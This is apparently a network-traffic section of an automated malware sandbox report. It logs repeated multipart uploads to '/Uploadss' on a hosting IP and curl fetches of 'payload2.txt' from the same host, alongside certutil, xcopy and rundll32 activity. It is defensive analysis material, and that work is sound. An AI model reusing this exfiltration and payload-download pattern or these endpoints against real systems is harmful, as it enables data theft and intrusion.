Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e120409de9b0961d
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------df56891ade3f02b5
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5b9a6ba60e763601
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6125ed5460a004ed
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0cd032303c66daa3
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4103ce5fab37505e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e9d6222010bc4b93
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2aa72388551e1719
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------77f946c49d2aa0aa
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------23ddd58ceee731b1
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b152df86b4cdc780
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2d6437b9e8f9fa26
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f9fda7251b3940ec
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b875c75c93bfafb2
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------90b1444f43bf87bb
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f596c2ad5c87a402
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------eebee10a2c2a0a7e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fb127d9661ca100d
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6653a23fed80a45e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------37776beab8920800
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------40df58b3406d3c6c
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7048acb243c73c53
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------915bf5cdc8e28206
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b29bc1940f1b3cf8
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------faed09c6aeddfcad
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------9e028a09e8444741
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1ebd341a5c4734af
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0a25b701dad0bb75
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------917bcfd4af7652d9
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3755ae52020b6387
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5781aa9441631b3e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f897addde1370454
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------793f3f5fb8213a21
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------79bb560cb57ad0e1
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a317104ee2cc8105
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------883a00c3844ef429
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------57415b48de4d495c
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3cce8b88a3742ee2
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b2be66a73755a4fd
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------25a531a286c8b417
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------01eb8640365fd751
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6f4cfa28ab6b91ba
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0f60835c471703b6
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------30e95938f8d682b4
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fa71821352b7a857
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1d41fea49894b271
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4c1e4f796c2c9c93
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fff4f274d4698b1d
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------edd5ebff721373ff
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e20020832d30f3c0
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d4472314239c3705
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7e127aa7b6ef26df
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0cf99223c92232cd
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7ce2fb84c3dc7384
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d8f7e01a7de6f04f
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f7a61e38904fcff7
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------8977623888b015d2
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------8961b875dcb6c2ce
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------00f564c0c06baa17
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------eaaf87d8ac660071
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4db416eccd57981d
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6ea26e32a284dc76
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4be51b091cf7dce2
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fffb92063f61af58
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bcadf6652bcb5995
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a0c3d46717813838
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------71e83fa42945e82e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2774b4aa52ecef71
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------9299cdde274089f9
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------32889ea7ae55e121
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a678ad0b838c4a42
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------271c99aa13addee5
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4d702bb6621a98ce
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3ff2595632dfd343
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6be2ae2c8e7d9a07
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5287d62a7467fc4e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------124d7d68b6a08cfd
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------837b5fa459944e4b
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------22f31a976d8ccacd
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------adf6f33d0b6a389e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------69954c1bb23fa243
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------54f15fd9c89287c7
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------862973e7d8c5e47a
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------218f885d1d1b01f5
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------21ef4c783e5ef6a8
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------8d935b7ab73db626
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3e1bcbfd1ac49b71
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------453e0988638a690b
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------936caa563e76ca26
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------96aa930188ad95d0
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1c10b124588ac309
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7cef968b537d35d7
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------cd9315d0f70306a2
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1e25afe42fd86294
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------01894383c334ebcc
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2c7fc54d6c7c04d4
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bb4d8fe5f94a83f5
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a9d83593ce6d0496
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d2c48da37d466a87
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------450e1ee269f45e90
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0089c8439ef77124
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6e3e4c3b05a79857
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------521206e0c9b94cee
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3e6e6e56ae2cb74d
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------03a4310a76240f87
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0eac6bd829619dc3
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7554e3942a8f0809
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f183d5370c54fe4b
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------ca18e54d06119b02
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------998ba500316220a8
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2680bd2607a01273
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------03efbda4d78b7cdf
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a35d77128ae5cf6a
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49772 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknownTCP traffic detected without corresponding DNS query: 172.104.160.126
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087D8C0 recv,WSAGetLastError,
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /payload2.txt HTTP/1.1Host: 172.104.160.126:8099User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /payload2.txt HTTP/1.1Host: 172.104.160.126:8099User-Agent: curl/7.83.1Accept: */*
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exeString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exeString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4722Host: login.live.com
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drString found in binary or memory: http://172.104.160.
Source: rundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520153129.0000020A783B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:5000/Upl
